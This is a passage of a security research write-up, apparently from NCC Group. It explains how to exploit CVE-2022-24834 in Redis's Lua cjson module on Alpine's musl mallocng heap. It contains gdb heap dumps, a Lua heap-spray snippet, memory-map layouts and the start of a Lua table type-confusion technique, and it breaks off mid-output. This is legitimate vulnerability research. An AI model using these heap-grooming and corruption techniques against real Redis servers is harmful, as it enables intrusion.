Reading view

There are new articles available, click to refresh the page.

Pumping Iron on the Musl Heap – Real World CVE-2022-24834 Exploitation on an Alpine mallocng Heap

This post is about exploiting CVE-2022-24834 against a Redis
container running on Alpine
Linux
. CVE-2022-24834 is a vulnerability affecting the Lua cjson
module in Redis servers <=7.0.11. The bug is an integer overflow that
leads to a large copy of data, approximately 350MiB.

A colleague from NCC Group wanted to exploit this bug but found that
the public exploits didn’t work. This was ultimately due to those
exploits being written to target Ubuntu or similar distros, which use
the GNU libc library.
The target in our case was Alpine 13.8, which uses musl libc 1.2.4. The important
distinction here is that GNU libc uses the ptmalloc2 heap allocator, and
musl 1.2.4 uses its own custom allocator called mallocng. This resulted
in some interesting differences during exploitation, which I figured I
would document since there’s not a lot of public information about
targeting the musl heap.

I highly recommend reading Ricerca Security’s original writeup,
which goes into depth about the vulnerability and how they approached
exploitation on ptmalloc2. Conviso Lab’s has a README.md that
describes some improvements that they made, which is also worth a look.
There are quite a few differences between exploitation on ptmalloc2 and
mallocng, which I’ll explain as I go. I’ll try not to repeat the details
that previous research has already provided but rather focus on the
parts that differed for mallocng.

Finally, I want to note that I am not attacking the musl mallocng
allocator by corrupting its metadata, but rather I’m doing Lua-specific
exploitation on the mallocng heap, mimicking the strategy done by the
original exploit.

Lua 5.1

As the previous articles covered Lua internals in detail, I won’t
repeat that information here. Redis uses Lua 5.1, so it’s important to
refer to the specific version when reading, as Lua has undergone
significant changes across different releases. These changes include
structure layouts and the garbage collection algorithm utilized.

I would like to highlight that Lua utilizes Tagged Values to
represent various internal types such as numbers and tables. The
structure is defined as follows:

/*
** Tagged Values
*/

#define TValuefields                                                           \
    Value value;                                                               \
    int   tt

typedef struct lua_TValue {
    TValuefields;
} TValue;

In this structure, tt denotes the type, and
value can either be an inline value or a pointer depending
on the associated type. In Lua, a Table serves as the
primary storage type, akin to a dictionary or list in Python. It
contains an array of TValue structures. For simple types
like integers, value is used directly. However, for more
complex types like nested tables, value acts as a pointer.
For further implementation details, please refer to Lua’s
lobject.h file or the aforementioned articles.

During debugging, I discovered the need to inspect Lua 5.1 objects.
The Alpine redis-server target did not include symbols for
the static Lua library. To address this, I compiled my own version of
Lua and filtered out all function symbols to only access the structure
definitions easily. This was achieved by identifying and stripping out
all FUNC symbols using readelf -Ws and
objcopy --strip-symbol.

Additionally, I came across the GdbLuaExtension,
which offers pretty printers and other functionalities for analyzing Lua
objects, albeit supporting version 5.3 only. I made some minor
modifications
to enable its compatibility with Lua 5.1. These
changes enabled features like pretty printers for tables, although I
didn’t conduct exhaustive testing on the required functionalities.

This method provides a clearer analysis of objects like a
Table, presenting information in a more readable format
compared to a hexdump.

(gdb) p/x *(Table *) 0x7ffff7a05100
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffaf9ef620 <lua_table^> 0x7ffff4a76322,
  [2] = (TValue *) 0x7fffaf9ef630 <lua_table^> 0x7ffff7a051a0,
  [3] = (TValue *) 0x7fffaf9ef640 <lua_table^> 0x7ffff7a051f0,
  [4] = (TValue *) 0x7fffaf9ef650 <lua_table^> 0x7ffff7a05290,
  [5] = (TValue *) 0x7fffaf9ef660 <lua_table^> 0x7ffff7a052e0,

The Table we printed shows an array of
TValue structures, and we can see that each
TValue in our table is referencing another table.

Musl’s Next
Generation Allocator – aka mallocng

On August 4, 2020,
musl 1.2.1 shipped a new heap algorithm called “mallocng”. This
allocator has received some good quality research in the past,
predominantly focused on CTF challenge exploitation. I didn’t find any
real-world exploitation examples, but if someone knows of some, please
let me know and I’ll update the article.

The mallocng allocator is slab-based and organizes fixed-sized
allocations (called slots) on multi-page slabs (called
groups). In general, groups are mmap()-backed.
However, groups containing small slots may actually be less than a size
of a page, in which case the group is actually just a larger fixed-sized
slot on a larger group. The allocator not using brk() is an
important detail as we will see later. The fixed size for a given group
is referred to as the group’s stride.

The mallocng allocator seems to be designed with security in mind,
mixing a combination of in-band metadata that contains some cookies,
with predominantly out-of-band metadata which is stored in slots on
dedicated group mappings that are prefixed with guard pages to prevent
corruption from linear overflows.

As I’m not actually going to be exploiting the allocator internals
itself, I won’t go into too much detail about the data structures. I
advise you to read pre-existing articles, which you can find in the
resource section.

There’s a useful gdb plugin called muslheap developed by
xf1les, which I made a lot of use of. xf1les also has an associated blog
post
which is worth reading. At the time of writing, I have a PR open to add
this functionality to pwndbg, and hopefully will have time add some more
functionality to it afterwards.

There is one particularly interesting aspect of the allocator that I
want to go over, which is that it can adjust the starting offset of
slots inside a group across subsequent allocations, using a value it
calls the cycling offset. It only does so if the overhead of a given
slot inside the fixed size has a large enough remainder such that the
offset can be adjusted. Interestingly, in this case, because the slot we
are working in is the 0x50-stride group, and the Table
structure is 0x48 bytes, this cycling offset doesn’t apply. Since I
narrowly avoided having to deal with this, and originally thought I
would have to, I’ll still take a moment to explain what the mitigation
actually is for and what it looks like in practice.

mallocng Cycling Offset

The cycling offset is a technique used to mitigate double frees,
although it can have a negative effect on other exploitation scenarios
as well. It works by adjusting the offset of the user data part of an
allocation each time a chunk is used, wrapping back to the beginning
once the offset is larger than the slack space. The offset starts at 1
and increments each time the chunk is reused.

The idea behind mitigating a double free is that if a chunk is used
and then freed, and then re-used, the offset used for the second
allocation will not be the same as the first time, due to cycling. Then,
when it is double freed, that free will detect some in-band metadata
anomaly and fail.

The allocator goes about this offset cycling by abusing the fact that
groups have fixed-sized slots, and often the user data being allocated
will not fill up the entire space of the slot, resulting in some slack
space. If the remaining slack space in the slot is large enough, which
is calculated by subtracting both the size of the user data and the
required in-line metadata, then there are actually two in-line metadata
blocks used inside a slot. One contains an offset used to indicate the
actual start of the user data, and that user data will still have some
metadata prefixed before it.

The offset calculation is done in the enframe()
function in mallocng. Basically, each time a slot is allocated, the
offset is increased, and will wrap back around when it exceeds the size
of the slack.

To demonstrate what the cycling offset looks like in practice, I will
focus on larger-than-Table stride groups, that have enough
slack such that the cycling offset will be used. If we review what the
stride sizes are, we see:

sizeclass stride sizeclass stride sizeclass stride sizeclass stride
1 0x20 13 0x140 25 0xaa0 37 0x5540
2 0x30 14 0x190 26 0xcc0 38 0x6650
3 0x40 15 0x1f0 27 0xff0 39 0x7ff0
4 0x50 16 0x240 28 0x1240 40 0x9240
5 0x60 17 0x2a0 29 0x1540 41 0xaaa0
6 0x70 18 0x320 30 0x1990 42 0xccc0
7 0x80 19 0x3f0 31 0x1ff0 43 0xfff0
8 0x90 20 0x480 32 0x2480 44 0x12480
9 0xa0 21 0x540 33 0x2aa0 45 0x15540
10 0xc0 22 0x660 34 0x3320 46 0x19980
11 0xf0 23 0x7f0 35 0x3ff0 47 0x1fff0

Using a cycling offset requires an additional 4-byte in-band header
and also increases by UNIT-sized (16-byte) increments. As
such, I think it’s unlikely for strides <= 0xf0 to have the cycling
offset applied (though I haven’t tested each). There might be some
exceptions, like if sometimes smaller allocations are placed into larger
strides rather than always allocating a new group, but I’m not sure if
that’s possible as I haven’t spent enough time studying the allocator
yet.

In light of this understanding, for the sake of demonstrating when
cycling offsets are used, we’ll look at the 0x140 stride. I allocate a
few tables, fill their arrays such that the resulting sizes are ~0x100
bytes.

I use Lua to leak the address of an outer table. Then in gdb I
analyze the array of all the tables it references, which should be of
increasing size. Let’s look at the first inner table’s array first:

pwndbg> p/x *(Table *)  0x7ffff7a945b0
$2 = <lua_table> = {
  [1] = (TValue *) 0x7ffff7a99880 <lua_table^> 0x7ffff7a94740,
  [2] = (TValue *) 0x7ffff7a99890 <lua_table^> 0x7ffff7a93d80,
  [3] = (TValue *) 0x7ffff7a998a0 <lua_table^> 0x7ffff7a93e70,
  [4] = (TValue *) 0x7ffff7a998b0 <lua_table^> 0x7ffff7a95040,
  [5] = (TValue *) 0x7ffff7a998c0 <lua_table^> 0x7ffff7a950e0,
...
pwndbg> p/x ((Table *)  0x7ffff7a94740)->array
$4 = 0x7ffff7a94e40
pwndbg> mchunkinfo 0x7ffff7a94e40
============== IN-BAND META ==============
        INDEX : 2
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x29 (group --> 0x7ffff7a94ba0)

================= GROUP ================== (at 0x7ffff7a94ba0)
         meta : 0x555555a69040
   active_idx : 2

================== META ================== (at 0x555555a69040)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a94ba0
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]UU (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a94e30)
      cycling offset : 0x1 (userdata --> 0x7ffff7a94e40)
        nominal size : 0x100
       reserved size : 0x2c
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

The first chunk we see under the == SLOT == head has a
cycling offset of 1. We can see that the slot itself starts at
0x7ffff7a94e30, but the user data does not start at the same address,
but rather 0x10-bytes further. This is due to the cycling offset *
UNIT adjustment. If we quickly look at a Table
(stride 0x50) slot, which is of a size that doesn’t allow enough slack
to use a cycling offset, we can see the difference:

pwndbg> mchunkinfo 0x7ffff7a94740
============== IN-BAND META ==============
        INDEX : 11
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x37 (group --> 0x7ffff7a943c0)

================= GROUP ================== (at 0x7ffff7a943c0)
         meta : 0x555555a68ea0
   active_idx : 11

================== META ================== (at 0x555555a68ea0)
         prev : 0x555555a686f8
         next : 0x555555a68d38
          mem : 0x7ffff7a943c0
     last_idx :
   avail_mask : 0x0   (0b00000000000)
   freed_mask : 0x5ac (0b10110101100)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 4 (stride: 0x50)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]FUFFUFUFFUU (from slot 11 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : Do nothing

================== SLOT ================== (at 0x7ffff7a94740)
      cycling offset : 0x0 (userdata --> 0x7ffff7a94740)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

Above, we see the SLOT section indicates a cycling
offset of 0. This will hold true for all Table allocations
in a stride 0x50 group. In this case, the user data starts at the same
location as the slot.

So now let’s look at the second stride 0x140 group’s slot that we
allocated earlier:

pwndbg> p/x ((Table *)  0x7ffff7a93d80)->array
$4 = 0x7ffff7a96ca0
pwndbg> mchunkinfo 0x7ffff7a96ca0
============== IN-BAND META ==============
        INDEX : 1
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x17 (group --> 0x7ffff7a96b20)

================= GROUP ================== (at 0x7ffff7a96b20)
         meta : 0x555555a690e0
   active_idx : 2

================== META ================== (at 0x555555a690e0)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a96b20
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: U[U]U (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a96c70)
      cycling offset : 0x3 (userdata --> 0x7ffff7a96ca0)
        nominal size : 0x100
       reserved size : 0xc
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

This second array has a cycling offset of 3, so it starts 0x30 bytes
further than the start of the slot. Clearly, this slot has been used a
few times already.

The main takeaways here are:

  • For certain allocation sizes, the exact offset of an overflow may be
    unreliable unless you know exactly how many times the slot has been
    allocated.
  • For a scenario like overwriting the LSB of a pointer inside of such
    a group, you could be unable to predict where the resulting pointer will
    point inside of another slot, depending on whether you know how many
    times each slot has been used.

Considering all this in the context of the exploit this article
describes, I think that because we have fine-grained control over all
the allocations performed for our overflow, this mitigation wouldn’t
have stopped us. Even if the structures had been on a ‘stride’ group
that uses the cycling offsets, because we can easily control the number
of times the slots are actually used prior to overflow. That said, since
I originally thought it might be a problem and wanted to understand it,
hopefully the explanation was still interesting.

With that out of the way, let’s look into how to exploit
CVE-2022-24834 on the musl heap.

Exploiting
CVE-2022-24834 on the mallocng heap

To quickly recap the vulnerability, it’s an integer overflow when
calculating the size of a buffer to allocate while doing cjson encoding.
By triggering the overflow, we end up with an undersized buffer that we
can write 0x15555555 bytes to (341 MiB), which may be large enough to
qualify as a “wild copy,” although on a 64-bit target and the amount of
memory on modern systems, it’s not too hard to deal with. Exploitation
requires that the target buffer that we want to corrupt must be adjacent
to the overflown buffer with no unmapped gaps in between, so at a
minimum around 350 MiB.

While exploiting ptmalloc2, Ricerca Security solved this problem by
extending the heap, which is brk()-based, to ensure that
enough space exists. Once the extension occurs, it won’t be shrunk
backward. This makes it easy to ensure no unmapped memory regions exist,
and that the 0x15555555-byte copy won’t hit any invalid memory.

This adjacent memory requirement poses some different problems on the
mallocng heap, which I’ll explain shortly.

After achieving the desired layout, the goal is to overwrite some
target chunk (or slot in our case) with the 0x22 value corresponding to
the ending double quote. In the Ricerca Security write-up, their
diagrams indicated they overwrote the LSB pointer of a
Table->array pointer; however, I believe their exploit
actually overwrites the LSB of a TValue->value pointer,
which exists in a chunk that is pointed to by the
Table->array. I may misunderstand their exploit, but at
any rate, the latter is the approach I used.

To summarize, the goal of the heap shaping is ultimately to ensure
that the allocation associated with a table’s array, which is pointed to
by Table->array, is adjacent to the buffer we overflow
so that we corrupt the TValue.

mallocng Heap Shaping

mallocng requires a different strategy than ptmalloc2, as it does not
use brk(). Rather, it will use mmap() to
allocate groups (below I will assume that the group itself is not a slot
of another group) and populate those groups with various fixed-size
slots. Freeing the group, which may occur if all of the slots in a group
are no longer used, results in memory backing the group to be unmapped
using munmap().

 

This means we must leverage feng shui to have valid in-use
allocations adjacent to each other at the time of the overflow. While
doing this, in order to analyze gaps in the memory space, I wrote a
small gdb utility which I’ll use to show the layout that we are working
with. A slightly modified version of this utility has also now been
added to pwndbg.

First, let’s look at what happens if we trigger the bug and allow the
copy to happen, without first shaping the heap. Note this first example
is showing the entire memory space to give an idea of what it looks
like, but in future output, I will limit what’s shown to more relevant
mappings.

The annotations added to to the mapping output are as follows:

  • ^-- ADJ: <num> indicates a series of adjacent
    memory regions, where <num> is the accumulated
    size
  • !!! GUARD PAGE indicates a series of pages with no
    permissions, which writing to would trigger a fault
  • [00....0] -- GAP: <num> indicates an unmapped
    page between mapped regions of memory, where <num> is
    the size of the gap
   0: 0x555555554000 - 0x5555555bf000    0x6b000 r--p
   2: 0x5555555bf000 - 0x555555751000   0x192000 r-xp
   3: 0x555555751000 - 0x5555557d3000    0x82000 r--p
   4: 0x5555557d3000 - 0x5555557da000     0x7000 r--p
   5: 0x5555557da000 - 0x555555833000    0x59000 rw-p
   6: 0x555555833000 - 0x555555a66000   0x233000 rw-p ^-- ADJ: 0x512000
   7: 0x555555a66000 - 0x555555a67000     0x1000 ---p !!! GUARD PAGE
   7: 0x555555a67000 - 0x555555af7000    0x90000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa2ed09000
   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x24348000
  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000
  13: 0x7ffff4717000 - 0x7ffff4c01000   0x4ea000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x1000
  14: 0x7ffff4c02000 - 0x7ffff4e00000   0x1fe000 rw-p
  15: 0x7ffff4e00000 - 0x7ffff5201000   0x401000 rw-p
  16: 0x7ffff5201000 - 0x7ffff5c00000   0x9ff000 rw-p
  17: 0x7ffff5c00000 - 0x7ffff5e01000   0x201000 rw-p
  18: 0x7ffff5e01000 - 0x7ffff6000000   0x1ff000 rw-p ^-- ADJ: 0x13fe000
  19: 0x7ffff6000000 - 0x7ffff6002000     0x2000 ---p !!! GUARD PAGE
  19: 0x7ffff6002000 - 0x7ffff6404000   0x402000 rw-p
  21: 0x7ffff6404000 - 0x7ffff6600000   0x1fc000 rw-p ^-- ADJ: 0x5fe000
  22: 0x7ffff6600000 - 0x7ffff6602000     0x2000 ---p !!! GUARD PAGE
  22: 0x7ffff6602000 - 0x7ffff6a04000   0x402000 rw-p
  24: 0x7ffff6a04000 - 0x7ffff6a6e000    0x6a000 rw-p
  25: 0x7ffff6a6e000 - 0x7ffff6c00000   0x192000 rw-p ^-- ADJ: 0x5fe000
  26: 0x7ffff6c00000 - 0x7ffff6c02000     0x2000 ---p !!! GUARD PAGE
  26: 0x7ffff6c02000 - 0x7ffff7004000   0x402000 rw-p
  28: 0x7ffff7004000 - 0x7ffff7062000    0x5e000 rw-p
  29: 0x7ffff7062000 - 0x7ffff715c000    0xfa000 rw-p
  30: 0x7ffff715c000 - 0x7ffff71ce000    0x72000 rw-p
  31: 0x7ffff71ce000 - 0x7ffff7200000    0x32000 rw-p
  32: 0x7ffff7200000 - 0x7ffff7a00000   0x800000 rw-p
  33: 0x7ffff7a00000 - 0x7ffff7a6f000    0x6f000 rw-p ^-- ADJ: 0xe6d000
  34: 0x7ffff7a6f000 - 0x7ffff7a71000     0x2000 ---p !!! GUARD PAGE
  34: 0x7ffff7a71000 - 0x7ffff7ac5000    0x54000 rw-p
  36: 0x7ffff7ac5000 - 0x7ffff7b0e000    0x49000 r--p
  37: 0x7ffff7b0e000 - 0x7ffff7dab000   0x29d000 r-xp
  38: 0x7ffff7dab000 - 0x7ffff7e79000    0xce000 r--p
  39: 0x7ffff7e79000 - 0x7ffff7ed2000    0x59000 r--p
  40: 0x7ffff7ed2000 - 0x7ffff7ed5000     0x3000 rw-p
  41: 0x7ffff7ed5000 - 0x7ffff7ed8000     0x3000 rw-p
  42: 0x7ffff7ed8000 - 0x7ffff7ee9000    0x11000 r--p
  43: 0x7ffff7ee9000 - 0x7ffff7f33000    0x4a000 r-xp
  44: 0x7ffff7f33000 - 0x7ffff7f50000    0x1d000 r--p
  45: 0x7ffff7f50000 - 0x7ffff7f5a000     0xa000 r--p
  46: 0x7ffff7f5a000 - 0x7ffff7f5e000     0x4000 rw-p
  47: 0x7ffff7f5e000 - 0x7ffff7f62000     0x4000 r--p
  48: 0x7ffff7f62000 - 0x7ffff7f64000     0x2000 r-xp
  49: 0x7ffff7f64000 - 0x7ffff7f78000    0x14000 r--p
  50: 0x7ffff7f78000 - 0x7ffff7fc4000    0x4c000 r-xp
  51: 0x7ffff7fc4000 - 0x7ffff7ffa000    0x36000 r--p
  52: 0x7ffff7ffa000 - 0x7ffff7ffb000     0x1000 r--p
  53: 0x7ffff7ffb000 - 0x7ffff7ffc000     0x1000 rw-p
  54: 0x7ffff7ffc000 - 0x7ffff7fff000     0x3000 rw-p ^-- ADJ: 0x58e000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7fdf000
  55: 0x7ffffffde000 - 0x7ffffffff000    0x21000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xffff7fffff601000
  56: 0xffffffffff600000 - 0xffffffffff601000     0x1000 --xp

When we crash we see:

Thread 1 "redis-server" received signal SIGSEGV, Segmentation fault.
0x00005555556cd676 in json_append_string ()
(gdb) x/i $pc
=> 0x5555556cd676 <json_append_string+166>:     mov    %al,(%rcx,%rdx,1)
(gdb) info registers rcx rdx
rcx            0x7ffff3749010      140737277890576
rdx            0x14b7ff0           21725168
(gdb) x/x $rcx+$rdx
0x7ffff4c01000: Cannot access memory at address 0x7ffff4c01000

Our destination buffer (the buffer being copied to) was allocated at
0x7ffff3749010 (index 12), and after 0xfc1000 bytes, it
quickly writes into unmapped memory, which correlates to what we just
saw in the gap listing:

  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000

In this particular case, even if this gap didn’t exist, because we
didn’t shape the heap, we will inevitably run into a guard page and fail
anyway.

Similarly to the original exploit, shaping the heap to fill these
gaps is quite easy by just allocating lots of tables that point to
unique strings or large arrays of floating-point values. During this
process, it’s also useful to pre-allocate lots of other tables that are
used for different purposes, as well as anything else that may otherwise
create unwanted side effects on our well-groomed heap.

Ensuring Correct
Target Table->Array Distance

After solving the previous issue, the next problem is that even if we
fill the gaps, we have to be careful where our target buffer (the one we
want to corrupt) ends up being allocated. We need to take into account
that the large allocations for the source buffer (the one we copy our
controlled data from) might also be mapped at lower addresses in memory
than the target buffer, which might not be ideal. From the large gap map
listing above, we can see some large allocations at index 9 and 11,
which are related to generating a string large enough for the source
buffer to actually trigger the integer overflow.

   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p

Both the 9 and 11 mappings are roughly as big or larger than the
amount of memory that will actually be writing during our overflow, so
if our cjson buffer ends up being mapped before one of these maps, the
overflow will finish inside of the large string map and thus be useless.
Although in the case above our destination buffer (index 12) was
allocated later in memory than 9 and 11 and so won’t overflow into them,
in practice after doing heap shaping to fill all the gaps, this won’t
necessarily be the case.

This is an example of what that non-ideal scenario might look
like:

 

To resolve this, we must first shape the heap so that the target slot
we want to corrupt is actually mapped with an address lower than the
large mappings used for the source string. In this way, we can ensure
that our destination buffer ends up being directly before the target,
with only the exact amount of distance we need in between. To ensure
that our target slot gets allocated where we want, it needs to be large
enough to be in a single-slot group.

In order to ensure that our target buffer slot’s group gets allocated
after the aforementioned large strings, we can abuse the fact that we
can leak table addresses using Lua. By knowing the approximate size of
the large maps, we can predict when our target buffer would be mapped at
a lower address in memory and avoid it. By continuously allocating large
tables and leaking table addresses, we can work through relatively
adjacent mappings and eventually get an address that suddenly skips a
significantly sized gap, correlating to the large string allocations we
want to avoid. After this point, we can safely allocate the target
buffer we want to corrupt, followed by approximately 0x15556000 bytes of
filler memory, and then finally the destination buffer of the vulnerable
copy that we will overflow. Just a reminder, this order is in reverse of
what you might normally expect because each group is mmap()’ed at lower
addresses, but we overflow towards larger addresses.

The filler memory must still be adjacently mapped so that the copy
from the vulnerable cjson buffer to the target slot won’t encounter any
gaps. mallocng uses specific size thresholds for allocations that
determine the group they fit in. Each stride up to a maximum threshold
has an associated ‘sizeclass’. There are 48 sizeclasses. Anything above
the MMAP_THRESHOLD (0x1FFEC) will fall into a ‘special’
sizeclass 63. In these cases, it will map a single-slot group just for
that single allocation only. We can utilize this to trigger large
allocations that we know will be of a fixed size, with fixed contents,
and won’t be used by any other code. I chose to use mappings of size
0x101000, as I found they were consistently mapped adjacent to each
other by mmap(), as sizes too large or too small seemed to
occasionally create unwanted gaps.

To actually trigger the large allocations, I create a Lua table of
floating pointer numbers. The array contains TValue
structures with inline numeric values. Therefore, we just need to create
a table with an array big enough to cause the 0x101000 map (keeping in
mind the in-band metadata, which will add overhead). I do something like
this:

-- pre-allocate tables
for i = 1, math.floor(0x15560000 / 0x101000) + 1 do
    spray_pages[i] = {}
end
...
-- trigger the 0x101000-byte mappings
for i = 1, #spray_pages do
    for j = 1, 0xD000 do
        spray_pages[i][j] = 0x41414141
    end
end

I used the gap mapping script to confirm this behavior while
debugging and eventually ended up with something like this, where each
new table allocation ends up with a new array mapping like this:

   7: 0x555555a67000 - 0x5555564a1000   0xa3a000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa4439c000
   9: 0x7fff9a83d000 - 0x7fff9a93e000   0x101000 rw-p
  10: 0x7fff9a93e000 - 0x7fff9aa3f000   0x101000 rw-p
  11: 0x7fff9aa3f000 - 0x7fff9ab40000   0x101000 rw-p
  12: 0x7fff9ab40000 - 0x7fff9ac41000   0x101000 rw-p
  13: 0x7fff9ac41000 - 0x7fff9ad42000   0x101000 rw-p
  ...
 350: 0x7fffafe92000 - 0x7fffb0093000   0x201000 rw-p
 351: 0x7fffb0093000 - 0x7fffd00a4000 0x20011000 rw-p
 352: 0x7fffd00a4000 - 0x7fffd80a5000  0x8001000 rw-p ^-- ADJ: 0x3d868000
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2000
...

So the layout will ultimately look something like:

 

In the diagram above, the “source string slot” is the buffer from
which we copy our controlled data. The “cjson overflow slot” is the
vulnerable destination buffer that we overflow due to the integer
overflow, and the “target slot” is the victim buffer that we will
corrupt with our 0x22 byte.

There is one more thing which is that the exact offset of the
overflow may change by a small amount if the Lua script changes, or if
there are other side effects on the heap. This seems due to allocations
being made on the index 350 mapping above, before our actual target
buffer. I didn’t investigate this a lot, but it is likely solvable to
get rid of the indeterminism entirely. I chose to work around it by
using a slightly smaller offset, and repeatedly triggering the overflow
and increasing the length. The main caveat of multiple attempts is that
due to corruption of legitimate chunks we have to avoid the garbage
collector firing. Also, Lua has read-only strings, so each string being
allocated needs to be unique, so for each attempt that we make, it will
consume a few hundred MB of memory. In the event that our offset is too
far away, we may well exhaust the memory of the target before we
succeed. In practice, this isn’t a big issue, as once the exploit is
stable and the code isn’t changing, this offset won’t change.

Successful brute force applied to the previous example looks
something like this:

 

Lua Table Confusion

With that out of the way, we can get to the more interesting part. As
noted, we corrupt the LSB of a TValue structure such that
TValue->value points outside its original slot
boundaries. This leads to a sort of type confusion, where we can point
it into a different slot with data we control.

The corrupted array is like so:

 

While targeting ptmalloc2, the Ricera Security researchers showed
that it’s possible to modify a TValue that originally
pointed to a Table, and change its pointer such that it
points to a controlled part of a TString chunk, which
contains a fake Table structure. This can then be used to
kick off a read/write primitive. We can do something similar on
mallocng; however, we have much more strict limitations because the
group holding the Table structure referenced by our
corrupted TValue only contains other fixed-size slots, so
we will only be able to adjust the offset to point to these. Let’s take
a look at these constraints.

Because of the fixed-size slots, our “confused” table will overlap
with two 0x50-byte slots. Depending on the TValue address
being corrupted, it may still partially overlap with itself (as this
graphic shows):

 

A Lua string is made up of a structure called TString,
which is 0x18 bytes. It is immediately followed by the actual
user-controlled string data. This means that if we want to place a Lua
string into a group holding a Table, we will be limited by
how many bytes we actually control.

(gdb) ptype /ox TString
type = struct TString {
/* 0x0000      |  0x0008 */        GCObject *next;
/* 0x0008      |  0x0001 */        lu_byte tt;
/* 0x0009      |  0x0001 */        lu_byte marked;
/* 0x000a      |  0x0001 */        lu_byte reserved;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */        unsigned int hash;
/* 0x0010      |  0x0008 */        size_t len;

/* total size (bytes):   0x18 */
}

A Table is 0x48 bytes and is placed on a 0x50-stride
group. This means that only the last 0x30 bytes of a string can be used
to fully control the Table contents, assuming a direct
overlap.

(gdb) ptype /ox Table
type = struct Table {
/* 0x0000      |  0x0008 */    GCObject *next;
/* 0x0008      |  0x0001 */    lu_byte tt;
/* 0x0009      |  0x0001 */    lu_byte marked;
/* 0x000a      |  0x0001 */    lu_byte flags;
/* XXX  1-byte hole      */
/* 0x000c      |  0x0004 */    int readonly;
/* 0x0010      |  0x0001 */    lu_byte lsizenode;
/* XXX  7-byte hole      */
/* 0x0018      |  0x0008 */    struct Table *metatable;
/* 0x0020      |  0x0008 */    TValue *array;
/* 0x0028      |  0x0008 */    Node *node;
/* 0x0030      |  0x0008 */    Node *lastfree;
/* 0x0038      |  0x0008 */    GCObject *gclist;
/* 0x0040      |  0x0004 */    int sizearray;
/* XXX  4-byte padding   */

/* total size (bytes):   0x48 */
}

In practice, because we are dealing with a misaligned overlap, we can
still leverage all of the user-controlled TString data. As
previously mentioned, we don’t control the exact offset into the
TString we end up using. We are restricted by the fact that
the value written is 0x22. As it turns out, it’s still possible to make
it work, but it’s a little bit finicky.

To solve this problem, we need to figure out what the ideal
overlapping offset into a TString would be, such that we
fully control Table->array in our confused table. Even
if we control this array member though, we still need to
see what side effects exist and how they affect the other
Table fields. If some uncontrolled data pollutes a field in
a particular way, it could mean we can’t actually abuse the
array field.

Let’s look at the offsets of our slots inside the fixed-sized group.
If we know the address of a table from which we can start:

(gdb) p/x *(Table *) 0x7ffff7a5fa30
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffafe92650 <lua_table^> 0x7ffff497cac0,
  [2] = (TValue *) 0x7fffafe92660 <lua_table^> 0x7ffff7a5fad0,
  [3] = (TValue *) 0x7fffafe92670 <lua_table^> 0x7ffff7a5fb20,
  ...

Here we have a table at 0x7ffff7a5fa30, whose
array value contains a bunch of other tables. We want to,
however, analyze the 0x50-stride group that this table is on, as well as
the other slots in this group.

We can use mchunkinfo from the muslheap library to take a
look at the associated slot group.

(gdb) mchunkinfo 0x7ffff7a5fa30
============== IN-BAND META ==============
        INDEX : 8
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x28 (group --> 0x7ffff7a5f7a0)

================= GROUP ================== (at 0x7ffff7a5f7a0)
         meta : 0x555555aefc48
   active_idx : 24

================== META ================== (at 0x555555aefc48)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a5f7a0
     last_idx : 24
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x232d7200e6a00d1e
    sizeclass : 4 (stride: 0x50)
       maplen : 0
